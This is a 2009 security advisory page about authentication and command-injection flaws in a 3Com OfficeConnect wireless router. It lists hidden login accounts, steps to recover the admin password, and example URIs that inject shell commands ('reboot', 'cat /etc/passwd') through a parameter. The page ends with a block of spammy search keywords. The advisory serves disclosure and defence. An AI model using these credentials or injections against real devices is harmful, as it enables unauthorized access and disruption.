exploits , vulnerabilities , articles , 3Com OfficeConnect ADSL Wireless 11g Firewall Router Authentication Multiple Remote Vulnerabilities

Title	3Com OfficeConnect ADSL Wireless 11g Firewall Router Authentication Multiple Remote Vulnerabilities
Published	2009-10-19-12:00AM
Updated	2009-10-19-07:18PM
Class	Access Validation Error
CVE
Remote	Yes
Local	No
Credit	Andrea Fabrizi
Vulnerable	3Com OfficeConnect ADSL Wireless 11g Firewall Router 3.0
Not Vulnerable
Code	Attackers can use readily available tools to exploit these issues.These example URIs and proof of concept demonstrate the issues:1) SSH/Telnet to router using one of these hidden accounts: support:support user:5 nobody:admin 2) Type 9 3) Type 1 3) Type 3 to dump the configuration 4) Locate the sysPassword field: <sysPassword value="cXdlcnR5Cg=="/> 5) Decode the admin password: roland@hp6720s:~$ echo -ne "cXdlcnR5Cg==" \| base64 -d qwertyhttp://www.example.com/utility.cgi?testType=1&IP=aaa \|\| reboot http://www.example.com/utility.cgi?testType=1&IP=aaa \|\| cat /etc/passwd
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-16 Mozilla Firefox and SeaMonkey MFSA 2009-65 through -71 Multiple Vulnerabilities
2009-12-16 Merkaartor Insecure Temporary File Creation Vulnerability
2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 16:44:37 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.sexg.c administra sexy arabc glob...ans Galery+pho 200 /compo Wwwsexo.co viper gues www.3shase Turksex.co 200 /compo modernbill POP 3 expl news for c Advanced+G lo766l sothan america id dotnetnuke news for c www.jbtyw. oldmansex aiswarya r Mallika sh any+sex+ve mod_userdi oldmansex WWW.GOETV www.laptop Kusbusix 200 /compo Tamilsong Mobilebigs alltheweb 200 ///inc maxcpm.inf www.race.f www.rrms36 www.google Www.womans w...s/arti mambo Remo news for c suzie cari Grany slut leiren.wap Microsoft GFHGBN all cartoo %20boo